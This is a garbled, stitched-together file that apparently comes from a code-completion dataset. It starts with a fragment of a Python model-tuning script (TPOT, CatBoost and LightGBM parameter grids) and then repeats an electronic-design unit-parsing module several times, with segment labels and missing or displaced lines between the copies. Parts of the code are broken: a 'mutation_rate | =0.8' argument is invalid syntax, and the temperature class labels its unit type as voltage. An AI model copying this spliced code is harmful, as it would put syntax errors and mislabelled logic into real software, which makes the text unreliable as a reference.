# similar in effect to class_weight
"subsample": [0.85], # fraction of samples per boosting round, guards against overfitting
"min_child_weight": range(6, 7),
"max_depth": range(3, 8),
},
'catboost.CatBoostClassifier':
{
"learning_rate": [0.01],
"loss_function": ['CrossEntropy', 'Logloss'], # 取多少样本,放过拟合
"depth": range(9, 10),
"class_weights": [[1, i] for i in
np.linspace(tt - 1, tt + 1, 3)]},
'lightgbm.LGBMModel': {
'categorical_feature': ['auto'],
# 'weight': sample_weigh,
'boosting_type': ['gbdt', 'dart', 'rf'],
'n_estimators': range(20, 25),
'learning_rate': [0.1, 0.01],
'subsample_freq': [0.5, 0.8, 1],
'colsample_bytree': [0.5, 0.8, 1],
'num_leaves': range(28, 33),
}
}
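# --- Added sketch: how a restricted search space like `tpot_config` is consumed by TPOT
# on the full training set (illustrative only; the per-chunk loop below is what this
# script actually runs, so this stays commented out).
# tpot_all = TPOTClassifier(generations=10, population_size=150, scoring='f1',
#                           config_dict=tpot_config, n_jobs=-1, verbosity=2)
# tpot_all.fit(x_train.drop(["chunk_label", labels], axis=1), x_train[labels])
# print(tpot_all.score(x_test.drop(["chunk_label", labels], axis=1), x_test[labels]))
# tpot_all.export('tpot_best_pipeline.py')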
for i in range(5):
tpo = TPOTClassifier(generations=10, verbosity=2, population_size=150,
scoring='f1', n_jobs=-1, config_dict=tpot_config,
mutation_rate | =0.8, crossover_rate=0.2)
x_train_x = np.array(x_train[x_train["chunk_label"] == i].drop(["chunk_label", labels],
axis=1))
x_test_x = np.array(x_test[x_test["chunk_label"] == i].drop(["chunk_label", labels],
axis=1))
df_btest_x = df_btest[df_btest["chunk_label"] == i].drop("chunk_label",
axis=1)
y_train_x = np.array(x_train[labels])
# clf = tpo.fit(x_train_x, y_train_x)
#
# print(len(df_btest_x))
# print("=========modelu", i, "============")
# evalution_model(clf, df_btest_x.drop("is_sucess_by_contract", axis=1),
# df_btest_x["is_sucess_by_contract"])
#
#
# evalution_model(clf, df_btest.drop("is_sucess_by_contract", axis=1), df_btest["is_sucess_by_contract"])
#
#
# #
| conditional_block |
|
units.py | # units.py
# Unit classes/functions for hammer_vlsi.
#
# See LICENSE for licence details.
from abc import abstractmethod
import sys
try:
from abc import ABC # pylint: disable=ungrouped-imports
except ImportError:
if sys.version_info.major == 3 and sys.version_info.minor < 4:
# Python compatibility: 3.3
# Python 3.3 and below don't have abc.ABC
import abc # pylint: disable=ungrouped-imports
ABC = abc.ABCMeta('ABC', (object,), {'__slots__': ()}) # type: ignore
from typing import Optional, TypeVar
from hammer.utils import get_or_else
_TT = TypeVar('_TT', bound='ValueWithUnit')
class ValueWithUnit(ABC):
"""Represents some particular value that has units (e.g. "10 ns", "2000 um", "25 C", etc).
"""
# From https://stackoverflow.com/a/10970888
_prefix_table = {
'y': 1e-24, # yocto
'z': 1e-21, # zepto
'a': 1e-18, # atto
'f': 1e-15, # femto
'p': 1e-12, # pico
'n': 1e-9, # nano
'u': 1e-6, # micro
'm': 1e-3, # milli
'c': 1e-2, # centi
'd': 1e-1, # deci
'': 1, # <no prefix>
'k': 1e3, # kilo
'M': 1e6, # mega
'G': 1e9, # giga
'T': 1e12, # tera
'P': 1e15, # peta
'E': 1e18, # exa
'Z': 1e21, # zetta
'Y': 1e24, # yotta
}
@property
@abstractmethod
def unit(self) -> str:
"""Get the base unit for values (e.g. "s", "m", "V", etc).
Meant to be overridden by subclasses."""
@property
@abstractmethod
def unit_type(self) -> str:
"""Get the base unit type for values. (e.g. for "s", this would be "time")
Meant to be overridden by subclasses."""
@property
@abstractmethod
def default_prefix(self) -> str:
"""Get the default prefix for values.
(e.g. for time, specifying "n" would mean "0.25" would be interpreted as "0.25 ns".)
Meant to be overridden by subclasses."""
def __init__(self, value: str, prefix: Optional[str] = None) -> None:
"""
Create a value from parsing the given string.
:param value: Value encoded in the given string.
:param prefix: If value does not have a prefix (e.g. "0.25"), then use
the given prefix, or the default prefix defined by the
class if one is not specified.
"""
import re
default_prefix = get_or_else(prefix, self.default_prefix)
regex = r"^(-?[\d.]+) *(.*){}$".format(re.escape(self.unit))
match = re.search(regex, value)
if match is None:
try:
num = str(float(value))
self._value_prefix = default_prefix
except ValueError:
raise ValueError("Malformed {type} value {value}".format(type=self.unit_type,
value=value))
else:
num = match.group(1)
self._value_prefix = match.group(2)
if num.count('.') > 1 or len(self._value_prefix) > 1:
raise ValueError("Malformed {type} value {value}".format(type=self.unit_type,
value=value))
if self._value_prefix not in self._prefix_table:
raise ValueError("Bad prefix for {value}".format(value=value))
self._value = float(num) # type: float
# Preserve the prefix too to preserve precision
self._prefix = self._prefix_table[self._value_prefix] # type: float
@property
def value_prefix(self) -> str:
"""Get the prefix string of this value."""
return self._value_prefix
@property
def value(self) -> float:
"""Get the actual value of this value. (e.g. 10 ns -> 1e-9)"""
return self._value * self._prefix
def value_in_units(self, prefix: str, round_zeroes: bool = True) -> float:
"""Get this value in the given prefix. e.g. "ns", "mV", etc.
"""
# e.g. extract "n" from "ns" or blank if it's blank (e.g. "V" -> "")
letter_prefix = ""
if prefix != self.unit:
letter_prefix = "" if prefix == "" else prefix[0]
retval = self._value * (self._prefix / self._prefix_table[letter_prefix])
if round_zeroes: # pylint: disable=no-else-return
return round(retval, 3)
else:
return retval
def str_value_in_units(self, prefix: str, round_zeroes: bool = True) -> str:
"""Get this value in the given prefix but including the units.
e.g. return "5 ns".
:param prefix: Prefix for the resulting value - e.g. "ns".
:param round_zeroes: True to round 1.00000001 etc to 1 within 3 decimal places.
"""
# %g removes trailing zeroes
return "%g" % (self.value_in_units(prefix, round_zeroes)) + " " + prefix
# Comparison operators.
# Note that mypy doesn't properly support type checking on equality
# operators so the type of __eq__ is object :(
# As a result, the operators' (e.g. __eq__) 'other' type can't be _TT.
# Therefore, we implement the operators themselves separately and then wrap
# them in the special operators.
# See https://github.com/python/mypy/issues/1271
# Disable useless pylint checks for the following methods.
# pylint: disable=unidiomatic-typecheck
def eq(self: _TT, other: _TT) -> bool: # pylint: disable=invalid-name
"""
Compare equality of this value with another.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value_in_units(self.default_prefix) == other.value_in_units(self.default_prefix)
def __eq__(self: _TT, other: object) -> bool:
"""
Compare equality of this value with another.
The types must match.
"""
return self.eq(other) # type: ignore
def ne(self: _TT, other: _TT) -> bool: # pylint: disable=invalid-name
"""
Compare inequality of this value with another.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return not self.eq(other)
def __ne__(self: _TT, other: object) -> bool:
"""
Compare inequality of this value with another.
The types must match.
"""
return self.ne(other) # type: ignore
def __lt__(self: _TT, other: _TT) -> bool:
"""
Check if self is less than other.
The types must match.
"""
if type(self) != type(other):
|
return self.value < other.value
def __le__(self: _TT, other: _TT) -> bool:
"""
Check if self is less than or equal to other.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value <= other.value
def __gt__(self: _TT, other: _TT) -> bool:
"""
Check if self is greater than other.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value > other.value
def __ge__(self: _TT, other: _TT) -> bool:
"""
Check if self is greater than or equal to other.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value >= other.value
def __add__(self: _TT, other: _TT) -> _TT:
"""
Add other and self.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return type(self)(str(self.value + other.value),"")
def __sub__(self: _TT, other: _TT) -> _TT:
"""
Subtract other from self.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return type(self)(str(self.value - other.value),"")
def __div__(self: _TT, other: float) -> _TT:
"""
Divide self by a float or an integer.
"""
raise NotImplementedError()
# Some python nonsense
def __truediv__(self: _TT, other: float) -> _TT:
return type(self)(str(self.value / other),"")
def __mul__(self: _TT, other: float) -> _TT:
"""
Multiply self by a float or an integer.
"""
return type(self)(str(self.value * other),"")
class TimeValue(ValueWithUnit):
"""Time value - e.g. "4 ns".
Parses time values from strings.
"""
@property
def default_prefix(self) -> str:
"""Default prefix: ns"""
return "n"
@property
def unit(self) -> str:
return "s"
@property
def unit_type(self) -> str:
return "time"
class VoltageValue(ValueWithUnit):
"""Voltage value - e.g. "0.95 V", "950 mV".
"""
@property
def default_prefix(self) -> str:
"""Default is plain volts (e.g. "0.1" -> 0.1 V)."""
return ""
@property
def unit(self) -> str:
return "V"
@property
def unit_type(self) -> str:
return "voltage"
class TemperatureValue(ValueWithUnit):
"""Temperature value in Celsius - e.g. "25 C", "125 C".
Mainly used for specifying corners for MMMC.
"""
@property
def default_prefix(self) -> str:
"""Default is plain degrees Celsius (e.g. "25" -> "25 C")."""
return ""
@property
def unit(self) -> str:
return "C"
@property
def unit_type(self) -> str:
return "voltage"
class CapacitanceValue(ValueWithUnit):
"""Capacitance value - e.g. "5 fF", "10 nF".
"""
@property
def default_prefix(self) -> str:
"""Default prefix: fF"""
return "f"
@property
def unit(self) -> str:
return "F"
@property
def unit_type(self) -> str:
return "capacitance"
| raise TypeError("Types do not match") | conditional_block |
units.py | # units.py
# Unit classes/functions for hammer_vlsi.
#
# See LICENSE for licence details.
from abc import abstractmethod
import sys
try:
from abc import ABC # pylint: disable=ungrouped-imports
except ImportError:
if sys.version_info.major == 3 and sys.version_info.minor < 4:
# Python compatibility: 3.3
# Python 3.3 and below don't have abc.ABC
import abc # pylint: disable=ungrouped-imports
ABC = abc.ABCMeta('ABC', (object,), {'__slots__': ()}) # type: ignore
from typing import Optional, TypeVar
from hammer.utils import get_or_else
_TT = TypeVar('_TT', bound='ValueWithUnit')
class ValueWithUnit(ABC):
"""Represents some particular value that has units (e.g. "10 ns", "2000 um", "25 C", etc).
"""
# From https://stackoverflow.com/a/10970888
_prefix_table = {
'y': 1e-24, # yocto
'z': 1e-21, # zepto
'a': 1e-18, # atto
'f': 1e-15, # femto
'p': 1e-12, # pico
'n': 1e-9, # nano
'u': 1e-6, # micro
'm': 1e-3, # milli
'c': 1e-2, # centi
'd': 1e-1, # deci
'': 1, # <no prefix>
'k': 1e3, # kilo
'M': 1e6, # mega
'G': 1e9, # giga
'T': 1e12, # tera
'P': 1e15, # peta
'E': 1e18, # exa
'Z': 1e21, # zetta
'Y': 1e24, # yotta
}
@property
@abstractmethod
def unit(self) -> str:
"""Get the base unit for values (e.g. "s", "m", "V", etc).
Meant to be overridden by subclasses."""
@property
@abstractmethod
def unit_type(self) -> str:
"""Get the base unit type for values. (e.g. for "s", this would be "time")
Meant to be overridden by subclasses."""
@property
@abstractmethod
def default_prefix(self) -> str:
"""Get the default prefix for values.
(e.g. for time, specifying "n" would mean "0.25" would be interpreted as "0.25 ns".)
Meant to be overridden by subclasses."""
def __init__(self, value: str, prefix: Optional[str] = None) -> None:
"""
Create a value from parsing the given string.
:param value: Value encoded in the given string.
:param prefix: If value does not have a prefix (e.g. "0.25"), then use
the given prefix, or the default prefix defined by the
class if one is not specified.
"""
import re
default_prefix = get_or_else(prefix, self.default_prefix)
regex = r"^(-?[\d.]+) *(.*){}$".format(re.escape(self.unit))
match = re.search(regex, value)
if match is None:
try:
num = str(float(value))
self._value_prefix = default_prefix
except ValueError:
raise ValueError("Malformed {type} value {value}".format(type=self.unit_type,
value=value))
else:
num = match.group(1)
self._value_prefix = match.group(2)
if num.count('.') > 1 or len(self._value_prefix) > 1:
raise ValueError("Malformed {type} value {value}".format(type=self.unit_type,
value=value))
if self._value_prefix not in self._prefix_table:
raise ValueError("Bad prefix for {value}".format(value=value))
self._value = float(num) # type: float
# Preserve the prefix too to preserve precision
self._prefix = self._prefix_table[self._value_prefix] # type: float
@property
def value_prefix(self) -> str:
"""Get the prefix string of this value."""
return self._value_prefix
@property
def value(self) -> float:
"""Get the actual value of this value. (e.g. 10 ns -> 1e-9)"""
return self._value * self._prefix
def value_in_units(self, prefix: str, round_zeroes: bool = True) -> float:
"""Get this value in the given prefix. e.g. "ns", "mV", etc.
"""
# e.g. extract "n" from "ns" or blank if it's blank (e.g. "V" -> "")
letter_prefix = ""
if prefix != self.unit:
letter_prefix = "" if prefix == "" else prefix[0]
retval = self._value * (self._prefix / self._prefix_table[letter_prefix])
if round_zeroes: # pylint: disable=no-else-return
return round(retval, 3)
else:
return retval
def str_value_in_units(self, prefix: str, round_zeroes: bool = True) -> str:
"""Get this value in the given prefix but including the units.
e.g. return "5 ns".
:param prefix: Prefix for the resulting value - e.g. "ns".
:param round_zeroes: True to round 1.00000001 etc to 1 within 3 decimal places.
"""
# %g removes trailing zeroes
return "%g" % (self.value_in_units(prefix, round_zeroes)) + " " + prefix
# Comparison operators.
# Note that mypy doesn't properly support type checking on equality
# operators so the type of __eq__ is object :(
# As a result, the operators' (e.g. __eq__) 'other' type can't be _TT.
# Therefore, we implement the operators themselves separately and then wrap
# them in the special operators.
# See https://github.com/python/mypy/issues/1271
# Disable useless pylint checks for the following methods.
# pylint: disable=unidiomatic-typecheck
def eq(self: _TT, other: _TT) -> bool: # pylint: disable=invalid-name
"""
Compare equality of this value with another.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value_in_units(self.default_prefix) == other.value_in_units(self.default_prefix)
def __eq__(self: _TT, other: object) -> bool:
"""
Compare equality of this value with another.
The types must match.
"""
return self.eq(other) # type: ignore
def ne(self: _TT, other: _TT) -> bool: # pylint: disable=invalid-name
"""
Compare inequality of this value with another.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return not self.eq(other)
def __ne__(self: _TT, other: object) -> bool:
"""
Compare inequality of this value with another.
The types must match.
"""
return self.ne(other) # type: ignore
def __lt__(self: _TT, other: _TT) -> bool:
"""
Check if self is less than other.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value < other.value
def __le__(self: _TT, other: _TT) -> bool:
"""
Check if self is less than or equal to other.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value <= other.value
def __gt__(self: _TT, other: _TT) -> bool:
"""
Check if self is greater than other.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value > other.value
def __ge__(self: _TT, other: _TT) -> bool:
"""
Check if self is greater than or equal to other.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value >= other.value
def __add__(self: _TT, other: _TT) -> _TT:
"""
Add other and self.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return type(self)(str(self.value + other.value),"")
def __sub__(self: _TT, other: _TT) -> _TT:
"""
Subtract other from self.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return type(self)(str(self.value - other.value),"")
def __div__(self: _TT, other: float) -> _TT:
"""
Divide self by a float or an integer.
"""
raise NotImplementedError()
# Some python nonsense
def __truediv__(self: _TT, other: float) -> _TT:
return type(self)(str(self.value / other),"")
def | (self: _TT, other: float) -> _TT:
"""
Multiply self by a float or an integer.
"""
return type(self)(str(self.value * other),"")
class TimeValue(ValueWithUnit):
"""Time value - e.g. "4 ns".
Parses time values from strings.
"""
@property
def default_prefix(self) -> str:
"""Default prefix: ns"""
return "n"
@property
def unit(self) -> str:
return "s"
@property
def unit_type(self) -> str:
return "time"
class VoltageValue(ValueWithUnit):
"""Voltage value - e.g. "0.95 V", "950 mV".
"""
@property
def default_prefix(self) -> str:
"""Default is plain volts (e.g. "0.1" -> 0.1 V)."""
return ""
@property
def unit(self) -> str:
return "V"
@property
def unit_type(self) -> str:
return "voltage"
class TemperatureValue(ValueWithUnit):
"""Temperature value in Celsius - e.g. "25 C", "125 C".
Mainly used for specifying corners for MMMC.
"""
@property
def default_prefix(self) -> str:
"""Default is plain degrees Celsius (e.g. "25" -> "25 C")."""
return ""
@property
def unit(self) -> str:
return "C"
@property
def unit_type(self) -> str:
return "voltage"
class CapacitanceValue(ValueWithUnit):
"""Capacitance value - e.g. "5 fF", "10 nF".
"""
@property
def default_prefix(self) -> str:
"""Default prefix: fF"""
return "f"
@property
def unit(self) -> str:
return "F"
@property
def unit_type(self) -> str:
return "capacitance"
| __mul__ | identifier_name |
units.py | # units.py
# Unit classes/functions for hammer_vlsi.
#
# See LICENSE for licence details.
from abc import abstractmethod
import sys
try:
from abc import ABC # pylint: disable=ungrouped-imports
except ImportError:
if sys.version_info.major == 3 and sys.version_info.minor < 4:
# Python compatibility: 3.3
# Python 3.3 and below don't have abc.ABC
import abc # pylint: disable=ungrouped-imports
ABC = abc.ABCMeta('ABC', (object,), {'__slots__': ()}) # type: ignore
from typing import Optional, TypeVar
from hammer.utils import get_or_else
_TT = TypeVar('_TT', bound='ValueWithUnit')
class ValueWithUnit(ABC):
"""Represents some particular value that has units (e.g. "10 ns", "2000 um", "25 C", etc).
"""
# From https://stackoverflow.com/a/10970888 | 'z': 1e-21, # zepto
'a': 1e-18, # atto
'f': 1e-15, # femto
'p': 1e-12, # pico
'n': 1e-9, # nano
'u': 1e-6, # micro
'm': 1e-3, # milli
'c': 1e-2, # centi
'd': 1e-1, # deci
'': 1, # <no prefix>
'k': 1e3, # kilo
'M': 1e6, # mega
'G': 1e9, # giga
'T': 1e12, # tera
'P': 1e15, # peta
'E': 1e18, # exa
'Z': 1e21, # zetta
'Y': 1e24, # yotta
}
@property
@abstractmethod
def unit(self) -> str:
"""Get the base unit for values (e.g. "s", "m", "V", etc).
Meant to be overridden by subclasses."""
@property
@abstractmethod
def unit_type(self) -> str:
"""Get the base unit type for values. (e.g. for "s", this would be "time")
Meant to be overridden by subclasses."""
@property
@abstractmethod
def default_prefix(self) -> str:
"""Get the default prefix for values.
(e.g. for time, specifying "n" would mean "0.25" would be interpreted as "0.25 ns".)
Meant to be overridden by subclasses."""
def __init__(self, value: str, prefix: Optional[str] = None) -> None:
"""
Create a value from parsing the given string.
:param value: Value encoded in the given string.
:param prefix: If value does not have a prefix (e.g. "0.25"), then use
the given prefix, or the default prefix defined by the
class if one is not specified.
"""
import re
default_prefix = get_or_else(prefix, self.default_prefix)
regex = r"^(-?[\d.]+) *(.*){}$".format(re.escape(self.unit))
match = re.search(regex, value)
if match is None:
try:
num = str(float(value))
self._value_prefix = default_prefix
except ValueError:
raise ValueError("Malformed {type} value {value}".format(type=self.unit_type,
value=value))
else:
num = match.group(1)
self._value_prefix = match.group(2)
if num.count('.') > 1 or len(self._value_prefix) > 1:
raise ValueError("Malformed {type} value {value}".format(type=self.unit_type,
value=value))
if self._value_prefix not in self._prefix_table:
raise ValueError("Bad prefix for {value}".format(value=value))
self._value = float(num) # type: float
# Preserve the prefix too to preserve precision
self._prefix = self._prefix_table[self._value_prefix] # type: float
@property
def value_prefix(self) -> str:
"""Get the prefix string of this value."""
return self._value_prefix
@property
def value(self) -> float:
"""Get the actual value of this value. (e.g. 10 ns -> 1e-9)"""
return self._value * self._prefix
def value_in_units(self, prefix: str, round_zeroes: bool = True) -> float:
"""Get this value in the given prefix. e.g. "ns", "mV", etc.
"""
# e.g. extract "n" from "ns" or blank if it's blank (e.g. "V" -> "")
letter_prefix = ""
if prefix != self.unit:
letter_prefix = "" if prefix == "" else prefix[0]
retval = self._value * (self._prefix / self._prefix_table[letter_prefix])
if round_zeroes: # pylint: disable=no-else-return
return round(retval, 3)
else:
return retval
def str_value_in_units(self, prefix: str, round_zeroes: bool = True) -> str:
"""Get this value in the given prefix but including the units.
e.g. return "5 ns".
:param prefix: Prefix for the resulting value - e.g. "ns".
:param round_zeroes: True to round 1.00000001 etc to 1 within 3 decimal places.
"""
# %g removes trailing zeroes
return "%g" % (self.value_in_units(prefix, round_zeroes)) + " " + prefix
# Comparison operators.
# Note that mypy doesn't properly support type checking on equality
# operators so the type of __eq__ is object :(
# As a result, the operators' (e.g. __eq__) 'other' type can't be _TT.
# Therefore, we implement the operators themselves separately and then wrap
# them in the special operators.
# See https://github.com/python/mypy/issues/1271
# Disable useless pylint checks for the following methods.
# pylint: disable=unidiomatic-typecheck
def eq(self: _TT, other: _TT) -> bool: # pylint: disable=invalid-name
"""
Compare equality of this value with another.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value_in_units(self.default_prefix) == other.value_in_units(self.default_prefix)
def __eq__(self: _TT, other: object) -> bool:
"""
Compare equality of this value with another.
The types must match.
"""
return self.eq(other) # type: ignore
def ne(self: _TT, other: _TT) -> bool: # pylint: disable=invalid-name
"""
Compare inequality of this value with another.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return not self.eq(other)
def __ne__(self: _TT, other: object) -> bool:
"""
Compare inequality of this value with another.
The types must match.
"""
return self.ne(other) # type: ignore
def __lt__(self: _TT, other: _TT) -> bool:
"""
Check if self is less than other.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value < other.value
def __le__(self: _TT, other: _TT) -> bool:
"""
Check if self is less than or equal to other.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value <= other.value
def __gt__(self: _TT, other: _TT) -> bool:
"""
Check if self is greater than other.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value > other.value
def __ge__(self: _TT, other: _TT) -> bool:
"""
Check if self is greater than or equal to other.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value >= other.value
def __add__(self: _TT, other: _TT) -> _TT:
"""
Add other and self.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return type(self)(str(self.value + other.value),"")
def __sub__(self: _TT, other: _TT) -> _TT:
"""
Subtract other from self.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return type(self)(str(self.value - other.value),"")
def __div__(self: _TT, other: float) -> _TT:
"""
Divide self by a float or an integer.
"""
raise NotImplementedError()
# Some python nonsense
def __truediv__(self: _TT, other: float) -> _TT:
return type(self)(str(self.value / other),"")
def __mul__(self: _TT, other: float) -> _TT:
"""
Multiply self by a float or an integer.
"""
return type(self)(str(self.value * other),"")
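# --- Added sketch: the subclassing pattern the concrete classes below follow. This
# FrequencyValue is a hypothetical example (not part of this module); a new unit only
# needs to provide the three abstract properties declared above.
class FrequencyValue(ValueWithUnit):
    """Frequency value - e.g. "100 MHz", "1 GHz". (illustrative only)"""
    @property
    def default_prefix(self) -> str:
        """Default prefix: GHz"""
        return "G"
    @property
    def unit(self) -> str:
        return "Hz"
    @property
    def unit_type(self) -> str:
        return "frequency"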
class TimeValue(ValueWithUnit):
"""Time value - e.g. "4 ns".
Parses time values from strings.
"""
@property
def default_prefix(self) -> str:
"""Default prefix: ns"""
return "n"
@property
def unit(self) -> str:
return "s"
@property
def unit_type(self) -> str:
return "time"
class VoltageValue(ValueWithUnit):
"""Voltage value - e.g. "0.95 V", "950 mV".
"""
@property
def default_prefix(self) -> str:
"""Default is plain volts (e.g. "0.1" -> 0.1 V)."""
return ""
@property
def unit(self) -> str:
return "V"
@property
def unit_type(self) -> str:
return "voltage"
class TemperatureValue(ValueWithUnit):
"""Temperature value in Celsius - e.g. "25 C", "125 C".
Mainly used for specifying corners for MMMC.
"""
@property
def default_prefix(self) -> str:
"""Default is plain degrees Celsius (e.g. "25" -> "25 C")."""
return ""
@property
def unit(self) -> str:
return "C"
@property
def unit_type(self) -> str:
return "voltage"
class CapacitanceValue(ValueWithUnit):
"""Capacitance value - e.g. "5 fF", "10 nF".
"""
@property
def default_prefix(self) -> str:
"""Default prefix: fF"""
return "f"
@property
def unit(self) -> str:
return "F"
@property
def unit_type(self) -> str:
return "capacitance" | _prefix_table = {
'y': 1e-24, # yocto | random_line_split |
units.py | # units.py
# Unit classes/functions for hammer_vlsi.
#
# See LICENSE for licence details.
from abc import abstractmethod
import sys
try:
from abc import ABC # pylint: disable=ungrouped-imports
except ImportError:
if sys.version_info.major == 3 and sys.version_info.minor < 4:
# Python compatibility: 3.3
# Python 3.3 and below don't have abc.ABC
import abc # pylint: disable=ungrouped-imports
ABC = abc.ABCMeta('ABC', (object,), {'__slots__': ()}) # type: ignore
from typing import Optional, TypeVar
from hammer.utils import get_or_else
_TT = TypeVar('_TT', bound='ValueWithUnit')
class ValueWithUnit(ABC):
"""Represents some particular value that has units (e.g. "10 ns", "2000 um", "25 C", etc).
"""
# From https://stackoverflow.com/a/10970888
_prefix_table = {
'y': 1e-24, # yocto
'z': 1e-21, # zepto
'a': 1e-18, # atto
'f': 1e-15, # femto
'p': 1e-12, # pico
'n': 1e-9, # nano
'u': 1e-6, # micro
'm': 1e-3, # milli
'c': 1e-2, # centi
'd': 1e-1, # deci
'': 1, # <no prefix>
'k': 1e3, # kilo
'M': 1e6, # mega
'G': 1e9, # giga
'T': 1e12, # tera
'P': 1e15, # peta
'E': 1e18, # exa
'Z': 1e21, # zetta
'Y': 1e24, # yotta
}
@property
@abstractmethod
def unit(self) -> str:
|
@property
@abstractmethod
def unit_type(self) -> str:
"""Get the base unit type for values. (e.g. for "s", this would be "time")
Meant to be overridden by subclasses."""
@property
@abstractmethod
def default_prefix(self) -> str:
"""Get the default prefix for values.
(e.g. for time, specifying "n" would mean "0.25" would be interpreted as "0.25 ns".)
Meant to be overridden by subclasses."""
def __init__(self, value: str, prefix: Optional[str] = None) -> None:
"""
Create a value from parsing the given string.
:param value: Value encoded in the given string.
:param prefix: If value does not have a prefix (e.g. "0.25"), then use
the given prefix, or the default prefix defined by the
class if one is not specified.
"""
import re
default_prefix = get_or_else(prefix, self.default_prefix)
regex = r"^(-?[\d.]+) *(.*){}$".format(re.escape(self.unit))
match = re.search(regex, value)
if match is None:
try:
num = str(float(value))
self._value_prefix = default_prefix
except ValueError:
raise ValueError("Malformed {type} value {value}".format(type=self.unit_type,
value=value))
else:
num = match.group(1)
self._value_prefix = match.group(2)
if num.count('.') > 1 or len(self._value_prefix) > 1:
raise ValueError("Malformed {type} value {value}".format(type=self.unit_type,
value=value))
if self._value_prefix not in self._prefix_table:
raise ValueError("Bad prefix for {value}".format(value=value))
self._value = float(num) # type: float
# Preserve the prefix too to preserve precision
self._prefix = self._prefix_table[self._value_prefix] # type: float
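# --- Added note (illustrative, based on the parsing above): examples of rejected input.
# TimeValue("5 xs")     -> ValueError("Bad prefix ..."): "x" is not in _prefix_table.
# TimeValue("1.2.3 ns") -> ValueError("Malformed time value ..."): more than one ".".
# TimeValue("fast")     -> ValueError("Malformed time value ..."): not a number at all.
# TimeValue("0.25")     -> accepted: no unit given, the subclass default prefix applies.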
@property
def value_prefix(self) -> str:
"""Get the prefix string of this value."""
return self._value_prefix
@property
def value(self) -> float:
"""Get the actual value of this value. (e.g. 10 ns -> 1e-9)"""
return self._value * self._prefix
def value_in_units(self, prefix: str, round_zeroes: bool = True) -> float:
"""Get this value in the given prefix. e.g. "ns", "mV", etc.
"""
# e.g. extract "n" from "ns" or blank if it's blank (e.g. "V" -> "")
letter_prefix = ""
if prefix != self.unit:
letter_prefix = "" if prefix == "" else prefix[0]
retval = self._value * (self._prefix / self._prefix_table[letter_prefix])
if round_zeroes: # pylint: disable=no-else-return
return round(retval, 3)
else:
return retval
def str_value_in_units(self, prefix: str, round_zeroes: bool = True) -> str:
"""Get this value in the given prefix but including the units.
e.g. return "5 ns".
:param prefix: Prefix for the resulting value - e.g. "ns".
:param round_zeroes: True to round 1.00000001 etc to 1 within 3 decimal places.
"""
# %g removes trailing zeroes
return "%g" % (self.value_in_units(prefix, round_zeroes)) + " " + prefix
# Comparison operators.
# Note that mypy doesn't properly support type checking on equality
# operators so the type of __eq__ is object :(
# As a result, the operators' (e.g. __eq__) 'other' type can't be _TT.
# Therefore, we implement the operators themselves separately and then wrap
# them in the special operators.
# See https://github.com/python/mypy/issues/1271
# Disable useless pylint checks for the following methods.
# pylint: disable=unidiomatic-typecheck
def eq(self: _TT, other: _TT) -> bool: # pylint: disable=invalid-name
"""
Compare equality of this value with another.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value_in_units(self.default_prefix) == other.value_in_units(self.default_prefix)
def __eq__(self: _TT, other: object) -> bool:
"""
Compare equality of this value with another.
The types must match.
"""
return self.eq(other) # type: ignore
def ne(self: _TT, other: _TT) -> bool: # pylint: disable=invalid-name
"""
Compare inequality of this value with another.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return not self.eq(other)
def __ne__(self: _TT, other: object) -> bool:
"""
Compare inequality of this value with another.
The types must match.
"""
return self.ne(other) # type: ignore
def __lt__(self: _TT, other: _TT) -> bool:
"""
Check if self is less than other.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value < other.value
def __le__(self: _TT, other: _TT) -> bool:
"""
Check if self is less than or equal to other.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value <= other.value
def __gt__(self: _TT, other: _TT) -> bool:
"""
Check if self is greater than other.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value > other.value
def __ge__(self: _TT, other: _TT) -> bool:
"""
Check if self is greater than or equal to other.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value >= other.value
def __add__(self: _TT, other: _TT) -> _TT:
"""
Add other and self.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return type(self)(str(self.value + other.value),"")
def __sub__(self: _TT, other: _TT) -> _TT:
"""
Subtract other from self.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return type(self)(str(self.value - other.value),"")
def __div__(self: _TT, other: float) -> _TT:
"""
Divide self by a float or an integer.
"""
raise NotImplementedError()
# Some python nonsense
def __truediv__(self: _TT, other: float) -> _TT:
return type(self)(str(self.value / other),"")
def __mul__(self: _TT, other: float) -> _TT:
"""
Multiply self by a float or an integer.
"""
return type(self)(str(self.value * other),"")
class TimeValue(ValueWithUnit):
"""Time value - e.g. "4 ns".
Parses time values from strings.
"""
@property
def default_prefix(self) -> str:
"""Default prefix: ns"""
return "n"
@property
